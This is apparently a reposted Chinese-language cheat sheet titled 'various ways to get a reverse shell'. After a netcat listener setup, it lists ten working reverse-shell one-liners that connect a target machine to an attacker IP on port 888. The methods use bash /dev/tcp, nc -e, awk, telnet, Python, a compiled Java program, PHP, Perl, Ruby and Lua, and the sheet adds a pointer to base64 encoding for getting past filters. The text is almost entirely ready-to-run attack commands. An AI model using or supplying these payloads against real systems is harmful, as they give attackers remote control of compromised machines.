反弹shell的各种姿势
程序员文章站
2022-07-07 19:31:31
...
前言:攻击机器IP10.10.10.69
,监听端口888
,反弹命令均在目标机器上执行
nc -lvp 888
1、bash反弹
bash -i >& /dev/tcp/10.10.10.69/888 0>&1
base64编码绕过:http://www.jackson-t.ca/runtime-exec-payloads.html
2、nc反弹
nc -e /bin/bash 10.10.10.69 888
3、awk反弹
awk 'BEGIN{s="/inet/tcp/0/10.10.10.69/888";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'
4、telnet反弹
需在攻击监听两个端口,比如888和999端口,执行反弹shell命令后,在888终端输入命令,999终端查看命令执行后的结果
攻击机执行命令:
nc -lvp 888
nc -lvp 999
目标机执行命令:
telnet 10.10.10.69 888 | /bin/bash | telnet 10.10.10.69 999
5、Python反弹
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.10.69',888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
6、Java反弹
public class Test {
/**
* @param args
* @throws Exception
*/
public static void main(String[] args) throws Exception {
// TODO Auto-generated method stub
Runtime r = Runtime.getRuntime();
String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/10.10.10.69/888;cat <&5 | while read line; do $line 2>&5 >&5; done"};
Process p = r.exec(cmd);
p.waitFor();
}
}
保存为Test.java,编译执行,成功反弹shell
javac Test.java
java Test
7、PHP反弹
php -r '$sock=fsockopen("10.10.10.69",888);exec("/bin/sh -i <&3 >&3 2>&3");'
8、Perl反弹
perl -e 'use Socket;$i="10.10.10.69";$p=888;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
9、Ruby反弹
ruby -rsocket -e'f=TCPSocket.open("10.10.10.69",888).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
10、Lua反弹
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.10.10.69','888');os.execute('/bin/sh -i <&3 >&3 2>&3');"